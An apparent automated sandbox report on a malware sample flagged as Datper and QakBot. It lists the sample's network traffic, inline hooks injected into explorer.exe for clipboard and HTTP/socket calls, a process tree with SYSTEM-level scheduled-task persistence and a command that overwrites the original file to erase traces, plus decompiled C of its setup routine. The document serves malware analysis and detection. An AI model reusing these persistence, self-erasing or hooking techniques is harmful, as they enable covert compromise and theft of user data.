Nov 13, 2019 19:28:42.806310892 CET	0	OUT	GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: www.ip-adress.com Cache-Control: no-cache
Nov 13, 2019 19:28:42.951359987 CET	1	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Nov 2019 18:29:03 GMT Server: Apache Location: https://www.ip-adress.com/ Cache-Control: max-age=1 Expires: Wed, 13 Nov 2019 18:29:04 GMT Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 70 2d 61 64 72 65 73 73 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.ip-adress.com/">here</a>.</p></body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 13, 2019 19:28:43.046484947 CET	162.244.225.30	443	192.168.1.107	49158	CN=hcutk.org, OU=Gaqitkxu Meafniku, C=CA	CN=hcutk.org, O=Umkeu Zraskepud Inc., L=Pchijdiht, ST=NV, C=CA	Sat Oct 05 14:43:07 CEST 2019	Wed Oct 04 15:31:05 CEST 2023	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Nov 13, 2019 19:28:43.264657974 CET	209.126.124.166	443	192.168.1.107	49160	CN=*.ip-adress.com, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Wed May 16 02:00:00 CEST 2018 Wed Feb 12 01:00:00 CET 2014 Tue May 30 12:48:38 CEST 2000	Thu May 21 01:59:59 CEST 2020 Mon Feb 12 00:59:59 CET 2029 Sat May 30 12:48:38 CEST 2020	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
					CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Feb 12 01:00:00 CET 2014	Mon Feb 12 00:59:59 CET 2029
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Tue May 30 12:48:38 CEST 2000	Sat May 30 12:48:38 CEST 2020

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
TranslateMessage	INLINE	explorer.exe
GetClipboardData	INLINE	explorer.exe
HttpSendRequestExW	INLINE	explorer.exe
HttpOpenRequestW	INLINE	explorer.exe
HttpOpenRequestA	INLINE	explorer.exe
InternetReadFile	INLINE	explorer.exe
InternetQueryDataAvailable	INLINE	explorer.exe
InternetCloseHandle	INLINE	explorer.exe
InternetWriteFile	INLINE	explorer.exe
InternetReadFileExA	INLINE	explorer.exe
HttpSendRequestA	INLINE	explorer.exe
HttpSendRequestW	INLINE	explorer.exe
LdrLoadDll	INLINE	explorer.exe
ZwResumeThread	INLINE	explorer.exe
NtResumeThread	INLINE	explorer.exe
connect	INLINE	explorer.exe
WSASend	INLINE	explorer.exe
WSAConnect	INLINE	explorer.exe
send	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xE9 0x91 0x10 0x02 0x2F 0xF4
GetClipboardData	INLINE	0xE9 0x9F 0xF0 0x0F 0xFA 0xA4

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
HttpSendRequestExW	INLINE	0xE9 0x96 0x6A 0xAC 0xC4 0x49
HttpOpenRequestW	INLINE	0xE9 0x9A 0xAC 0xC9 0x90 0x0A
HttpOpenRequestA	INLINE	0xE9 0x9E 0xE2 0x2D 0xD8 0x89
InternetReadFile	INLINE	0xE9 0x96 0x6F 0xFC 0xC7 0x7A
InternetQueryDataAvailable	INLINE	0xE9 0x95 0x53 0x37 0x72 0x2A
InternetCloseHandle	INLINE	0xE9 0x9B 0xBC 0xCC 0xC0 0x0A
InternetWriteFile	INLINE	0xE9 0x93 0x36 0x6C 0xC3 0x39
InternetReadFileExA	INLINE	0xE9 0x9E 0xE0 0x0F 0xFC 0xCA
HttpSendRequestA	INLINE	0xE9 0x92 0x23 0x33 0x36 0x69
HttpSendRequestW	INLINE	0xE9 0x99 0x9D 0xD5 0x5B 0xBA

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
LdrLoadDll	INLINE	0xE9 0x92 0x27 0x70 0x0D 0xD4
ZwResumeThread	INLINE	0xE9 0x99 0x96 0x63 0x33 0x35
NtResumeThread	INLINE	0xE9 0x99 0x96 0x63 0x33 0x35

Process: explorer.exe, Module: WS2_32.dll

Function Name	Hook Type	New Data
connect	INLINE	0xE9 0x9B 0xB4 0x48 0x8F 0xF0
WSASend	INLINE	0xE9 0x90 0x0D 0xDB 0xB2 0x20
WSAConnect	INLINE	0xE9 0x95 0x52 0x23 0x3B 0xB0
send	INLINE	0xE9 0x97 0x7E 0xE8 0x8A 0xA0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: zhAQkCQvME.exe PID: 2276 Parent PID: 3600

General

Start time:	19:27:47
Start date:	13/11/2019
Path:	C:\Users\user\Desktop\zhAQkCQvME.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\zhAQkCQvME.exe'
Imagebase:	0x400000
File size:	676352 bytes
MD5 hash:	E7DE0CC04F0A433FCE5336B7C7504D2C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Datper, Description: detect Datper in memory, Source: 00000000.00000002.470976903.015F7000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group Rule: Datper, Description: detect Datper in memory, Source: 00000000.00000002.472365977.01B20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 0%, Metadefender, Browse
Reputation:	low

Chronological Activities

Analysis Process: zhAQkCQvME.exe PID: 2380 Parent PID: 2276

General

Start time:	19:27:49
Start date:	13/11/2019
Path:	C:\Users\user\Desktop\zhAQkCQvME.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\zhAQkCQvME.exe /C
Imagebase:	0x400000
File size:	676352 bytes
MD5 hash:	E7DE0CC04F0A433FCE5336B7C7504D2C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: jkfkdm.exe PID: 2340 Parent PID: 2276

General

Start time:	19:27:58
Start date:	13/11/2019
Path:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Imagebase:	0x400000
File size:	676352 bytes
MD5 hash:	E7DE0CC04F0A433FCE5336B7C7504D2C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Intezer, Browse
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2416 Parent PID: 2276

General

Start time:	19:27:58
Start date:	13/11/2019
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn ahizzkkevf /tr '\'C:\Users\user\Desktop\zhAQkCQvME.exe\' /I ahizzkkevf' /SC ONCE /Z /ST 19:29 /ET 19:41
Imagebase:	0x4b0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: zhAQkCQvME.exe PID: 2444 Parent PID: 1488

General

Start time:	19:41:01
Start date:	13/11/2019
Path:	C:\Users\user\Desktop\zhAQkCQvME.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\zhAQkCQvME.exe /I ahizzkkevf
Imagebase:	0x400000
File size:	676352 bytes
MD5 hash:	E7DE0CC04F0A433FCE5336B7C7504D2C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Datper, Description: detect Datper in memory, Source: 00000005.00000002.488530565.00EF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Datper, Description: detect Datper in memory, Source: 00000005.00000002.485394157.00AC7000.00000004.00000040.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: jkfkdm.exe PID: 2424 Parent PID: 2340

General

Start time:	19:41:01
Start date:	13/11/2019
Path:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C
Imagebase:	0x400000
File size:	676352 bytes
MD5 hash:	E7DE0CC04F0A433FCE5336B7C7504D2C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: jkfkdm.exe PID: 2480 Parent PID: 2444

General

Start time:	19:41:02
Start date:	13/11/2019
Path:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Imagebase:	0x400000
File size:	676352 bytes
MD5 hash:	E7DE0CC04F0A433FCE5336B7C7504D2C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2460 Parent PID: 2444

General

Start time:	19:41:03
Start date:	13/11/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c ping.exe -n 6 127.0.0.1 & type 'C:\Windows\System32\calc.exe' > 'C:\Users\user\Desktop\zhAQkCQvME.exe'
Imagebase:	0x49d90000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 2532 Parent PID: 2444

General

Start time:	19:41:04
Start date:	13/11/2019
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\schtasks.exe' /DELETE /F /TN ahizzkkevf
Imagebase:	0x810000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 2600 Parent PID: 2340

General

Start time:	19:41:04
Start date:	13/11/2019
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x20000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Datper, Description: detect Datper in memory, Source: 0000000C.00000003.535349218.01779000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: QakBot, Description: QakBot Payload, Source: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Author: kevoreilly Rule: Datper, Description: detect Datper in memory, Source: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: QakBot, Description: QakBot Payload, Source: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Author: kevoreilly
Reputation:	high

Chronological Activities

Analysis Process: PING.EXE PID: 2592 Parent PID: 2460

General

Start time:	19:41:04
Start date:	13/11/2019
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping.exe -n 6 127.0.0.1
Imagebase:	0x990000
File size:	15360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: jkfkdm.exe PID: 2660 Parent PID: 2480

General

Start time:	19:41:05
Start date:	13/11/2019
Path:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C
Imagebase:	0x400000
File size:	676352 bytes
MD5 hash:	E7DE0CC04F0A433FCE5336B7C7504D2C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: jkfkdm.exe PID: 696 Parent PID: 1692

General

Start time:	19:41:17
Start date:	13/11/2019
Path:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe'
Imagebase:	0x400000
File size:	676352 bytes
MD5 hash:	E7DE0CC04F0A433FCE5336B7C7504D2C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: jkfkdm.exe PID: 1864 Parent PID: 696

General

Start time:	19:41:18
Start date:	13/11/2019
Path:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C
Imagebase:	0x400000
File size:	676352 bytes
MD5 hash:	E7DE0CC04F0A433FCE5336B7C7504D2C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskhost.exe PID: 1432 Parent PID: 2600

General

Start time:	19:41:28
Start date:	13/11/2019
Path:	C:\Windows\System32\taskhost.exe
Wow64 process (32bit):	false
Commandline:	taskhost.exe
Imagebase:	0x830000
File size:	49152 bytes
MD5 hash:	72E953215CADE1A726C04AAFDF6B463D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: dwm.exe PID: 1612 Parent PID: 2600

General

Start time:	19:41:38
Start date:	13/11/2019
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\Dwm.exe
Imagebase:	0x90000
File size:	92672 bytes
MD5 hash:	505BF4D1CADEB8D4F8BCD08D944DE25D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 1692 Parent PID: 2600

General

Start time:	19:41:44
Start date:	13/11/2019
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x20000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3208 Parent PID: 2600

General

Start time:	19:42:02
Start date:	13/11/2019
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe '-1424767469172410782218338736475073951151716783479-3432011951180489686930716817
Imagebase:	0x3f0000
File size:	271360 bytes
MD5 hash:	761D6906DE888CF832606CFCDC9E7C47
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: notepad.exe PID: 3240 Parent PID: 2600

General

Start time:	19:42:22
Start date:	13/11/2019
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	notepad
Imagebase:	0x30000
File size:	179712 bytes
MD5 hash:	A4F6DF0E33E644E802C8798ED94D80EA
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 3608 Parent PID: 2600

General

Start time:	19:42:34
Start date:	13/11/2019
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe '-1474411583-1677719561-3844903701797535695-949774581987480516-1169154459-1441374392
Imagebase:	0x3f0000
File size:	271360 bytes
MD5 hash:	761D6906DE888CF832606CFCDC9E7C47
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: zhAQkCQvME.exe PID: 2276 Parent PID: 3600 zhAQkCQvME.exeUNIQUE

Executed Functions

Function 0040A090, Relevance: 70.5, APIs: 31, Strings: 9, Instructions: 482
stringlibraryloaderUNIQUELIBRARYCODECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E0040A090(void* __ecx, void* __fp0, struct _OSVERSIONINFOA* _a4, struct HINSTANCE__* _a8, WCHAR* _a12, signed int _a16) {
				WCHAR* _v8;
				union _SID_NAME_USE _v12;
				WCHAR* _v16;
				long _v20;
				WCHAR* _v24;
				long _v28;
				long _v32;
				WCHAR* _v36;
				short _v564;
				char _v628;
				long _v632;
				char _v3140;
				intOrPtr _t145;
				void** _t147;
				signed int _t149;
				signed int _t150;
				signed int _t157;
				int _t188;
				intOrPtr _t192;
				intOrPtr _t199;
				short _t201;
				signed int _t204;
				signed int _t206;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				intOrPtr _t225;
				WCHAR* _t266;
				WCHAR* _t296;
				WCHAR* _t299;
				WCHAR* _t357;
				void* _t373;
				void* _t375;
				void* _t377;
				void* _t387;
				void* _t389;
				void* _t396;

				_t396 = __fp0;
				_v28 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				E00404120(__ecx, _a4, 0, 0x1ed8);
				 *((intOrPtr*)(_a4 + 0x1a54)) = GetCurrentProcessId();
				E00408800(GetTickCount() +  *((intOrPtr*)(_a4 + 0x1a54)), _a4 + 0xa5c);
				_t375 = _t373 + 0x14;
				if(GetModuleFileNameW(0, _a4 + 0x1a58, 0x105) != 0) {
					__eflags = _a4 + 0x1a58;
					_t145 = E00404730(_a4 + 0x1a58, _a4 + 0x1a58, 0x5c);
					_t375 = _t375 + 8;
					 *((intOrPtr*)(_a4 + 0x1c64)) = _t145;
				} else {
					while(0 != 0) {
					}
				}
				_t147 = E004074B0(GetCurrentProcess()); // executed
				 *(_a4 + 0x104) = _t147;
				_t257 =  *( *(_a4 + 0x104));
				_t149 = E00407660( *( *(_a4 + 0x104)));
				_t377 = _t375 + 8;
				__eflags = _t149;
				if(_t149 == 0) {
					_t150 = E00407550(_t257); // executed
					__eflags = _t150;
					if(_t150 <= 0) {
						 *((intOrPtr*)(_a4 + 0x408)) = 1;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								goto L18;
							}
						}
					} else {
						 *((intOrPtr*)(_a4 + 0x408)) = 2;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
					}
				} else {
					 *((intOrPtr*)(_a4 + 0x408)) = 3;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
				}
				L18:
				 *(_a4 + 0x40c) = _a8;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_v28 = 0x80;
				_v20 = 0x80;
				_t157 = LookupAccountSidW(0,  *( *(_a4 + 0x104)), _a4 + 0x208,  &_v28, _a4 + 0x308,  &_v20,  &_v12); // executed
				__eflags = _t157;
				if(_t157 == 0) {
					_v32 = GetLastError();
					__eflags = _a4 + 0x308;
					E00403B30(_a4 + 0x308, 0x80, L"LookupAccountSidW() err %u", _v32);
					_t377 = _t377 + 0x10;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L25;
						}
					}
				}
				L25:
				__eflags = _a16 & 0x00000002;
				if((_a16 & 0x00000002) == 0) {
					__eflags = _a16 & 0x00000004;
					if((_a16 & 0x00000004) == 0) {
						_t266 = _a4 + 0x410;
						__eflags = _t266;
						GetModuleFileNameW( *(_a4 + 0x40c), _t266, 0x20a);
					} else {
						_v16 = _a12;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						lstrcpynW(_a4 + 0x410, _v16, 0x105);
						 *0x421610 = _v16[0x17f];
						 *0x421614 = _v16[0x183];
						 *0x421618 = _v16[0x185];
						 *0x42161c = _v16[0x189];
						 *0x421620 = _v16[0x18b];
						 *0x421624 = _v16[0x18f];
						 *0x421628 = _v16[0x191];
						 *0x42162c = _v16[0x195];
						 *0x421630 = _v16[0x197];
						 *0x421634 = _v16[0x19b];
					}
				} else {
					_v8 = _a12;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					lstrcpynW(_a4 + 0x410, _v8, 0x20a);
				}
				 *((intOrPtr*)(_a4 + 0x61c)) = E00404730(__eflags, _a4 + 0x410, 0x5c);
				lstrcpynW(_a4 + 0xc4, E00404730(__eflags, _a4 + 0x410, 0x5c), 0x40);
				 *((short*)(_a4 + 0xbc + lstrlenW(_a4 + 0xc4) * 2)) = 0;
				E00404B90(_a4 + 0xc4, _a4 + 0xc4, _a4 + 0xa4, 0x20);
				E00404780(_a4 + 0x410, _a4 + 0x620);
				lstrcpynW(_a4 + 0x850, _a4 + 0x620, 0x105);
				lstrcatW(_a4 + 0x850, 0x4187f0);
				lstrcatW(_a4 + 0x850, _a4 + 0xc4);
				_v36 = E00407F40(_a4 + 0xc4, 0x188c);
				lstrcatW(_a4 + 0x850, _v36);
				E00408170( &_v36);
				E00404820(__eflags, _a4 + 0x82a, 0xa, 0xf, _a4 + 0xa5c);
				_t188 = lstrlenA(_a4 + 0xa4);
				__eflags = _a4 + 0xa4;
				E00409910(_a4 + 0xa4, _t396, E0040DD20(_a4 + 0xa4, _t188, 0), _a4 + 0x1420);
				_t192 = E004076E0(GetCurrentProcess()); // executed
				_t387 = _t377 + 0x54;
				 *((intOrPtr*)(_a4 + 0x1430)) = _t192;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				E00404120(0, _a4, 0, 0x9c);
				_a4->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_a4);
				 *((intOrPtr*)(_a4 + 0x1dac)) = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				_t199 = E00409F10(_a4); // executed
				 *((intOrPtr*)(_a4 + 0xa0)) = _t199;
				_push( *((intOrPtr*)(_a4 + 0xa0))); // executed
				_t201 = E00409F40(); // executed
				_t389 = _t387 + 0x10;
				 *((short*)(_a4 + 0x9c)) = _t201;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_t204 = GetWindowsDirectoryW(_a4 + 0x1434, 0x104);
				__eflags = _t204;
				if(_t204 != 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L48;
						}
					}
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
				}
				L48:
				_t206 = GetEnvironmentVariableW(L"SystemRoot",  &_v564, 0x104);
				__eflags = _t206;
				if(_t206 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t357 = _a4 + 0x1434;
					__eflags = _t357;
					SetEnvironmentVariableW(L"SystemRoot", _t357);
				}
				_t209 = GetEnvironmentVariableW(L"USERPROFILE", _a4 + 0x1848, 0x209);
				__eflags = _t209;
				if(_t209 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_push("TEMP");
					E00403B30(_a4 + 0x1848, 0x20a, L"%s\\%s", _a4 + 0x1434);
					_t389 = _t389 + 0x14;
					_t299 = _a4 + 0x1848;
					__eflags = _t299;
					SetEnvironmentVariableW(L"USERPROFILE", _t299);
				}
				_t210 = GetEnvironmentVariableW(L"TEMP", _a4 + 0x163e, 0x20a);
				__eflags = _t210;
				if(_t210 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t296 = _a4 + 0x1848;
					__eflags = _t296;
					SetEnvironmentVariableW(L"TEMP", _t296);
				}
				_t211 = GetEnvironmentVariableA("SystemDrive",  &_v628, 0x3f);
				__eflags = _t211;
				if(_t211 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					SetEnvironmentVariableA("SystemDrive", "C:");
				}
				_v632 = 0x7f;
				GetComputerNameW(_a4 + 0x1db0,  &_v632); // executed
				E00408800(E0040DD20(_a4 + 0x1420, lstrlenA(_a4 + 0x1420), 0),  &_v3140);
				__eflags = _a4 + 0x1c68;
				E00408AB0( &_v3140,  &_v3140, _a4 + 0x1c68, 0x20);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a4 + 0x1c88;
				E00404820(_a4 + 0x1c88, _a4 + 0x1c88, 0x14, 0x1e,  &_v3140);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a16 & 0x00000001;
				if((_a16 & 0x00000001) == 0) {
					_t225 = E00409C00(); // executed
					 *((intOrPtr*)(_a4 + 0x1ca8)) = _t225;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L74;
						}
					}
				}
				L74:
				return 1;
			}

0x0040a090
0x0040a099
0x0040a0a0
0x0040a0a7
0x0040a0ae
0x0040a0b5
0x0040a0c7
0x0040a0d8
0x0040a0f8
0x0040a0fd
0x0040a119
0x0040a128
0x0040a12f
0x0040a134
0x0040a13a
0x0040a11b
0x0040a11b
0x0040a11f
0x0040a121
0x0040a147
0x0040a152
0x0040a161
0x0040a164
0x0040a169
0x0040a16c
0x0040a16e
0x0040a185
0x0040a18a
0x0040a18c
0x0040a1a6
0x0040a1b0
0x0040a1b0
0x0040a1b2
0x00000000
0x00000000
0x0040a1b4
0x0040a18e
0x0040a191
0x0040a19b
0x0040a19b
0x0040a19d
0x00000000
0x00000000
0x0040a19f
0x0040a1a1
0x0040a170
0x0040a173
0x0040a17d
0x0040a17d
0x0040a17f
0x00000000
0x00000000
0x0040a181
0x0040a183
0x0040a1b6
0x0040a1bc
0x0040a1c2
0x0040a1c2
0x0040a1c4
0x00000000
0x00000000
0x0040a1c6
0x0040a1c8
0x0040a1cf
0x0040a203
0x0040a209
0x0040a20b
0x0040a213
0x0040a227
0x0040a22e
0x0040a233
0x0040a236
0x0040a236
0x0040a238
0x00000000
0x00000000
0x0040a23a
0x0040a236
0x0040a23c
0x0040a23f
0x0040a242
0x0040a271
0x0040a274
0x0040a33b
0x0040a33b
0x0040a34c
0x0040a27a
0x0040a27d
0x0040a280
0x0040a280
0x0040a282
0x00000000
0x00000000
0x0040a284
0x0040a299
0x0040a2a8
0x0040a2b6
0x0040a2c5
0x0040a2d4
0x0040a2e2
0x0040a2f1
0x0040a300
0x0040a30e
0x0040a31d
0x0040a32c
0x0040a32c
0x0040a244
0x0040a247
0x0040a24a
0x0040a24a
0x0040a24c
0x00000000
0x00000000
0x0040a24e
0x0040a263
0x0040a263
0x0040a369
0x0040a38f
0x0040a3aa
0x0040a3c7
0x0040a3e2
0x0040a403
0x0040a417
0x0040a431
0x0040a444
0x0040a455
0x0040a45f
0x0040a47e
0x0040a49b
0x0040a4a5
0x0040a4b5
0x0040a4c4
0x0040a4c9
0x0040a4d2
0x0040a4d8
0x0040a4d8
0x0040a4da
0x00000000
0x00000000
0x0040a4dc
0x0040a4e9
0x0040a4f4
0x0040a4fe
0x0040a51e
0x0040a524
0x0040a52c
0x0040a53b
0x0040a53c
0x0040a541
0x0040a547
0x0040a54e
0x0040a54e
0x0040a550
0x00000000
0x00000000
0x0040a552
0x0040a562
0x0040a568
0x0040a56a
0x0040a574
0x0040a574
0x0040a576
0x00000000
0x00000000
0x0040a578
0x0040a56c
0x0040a56c
0x0040a56c
0x0040a56e
0x00000000
0x00000000
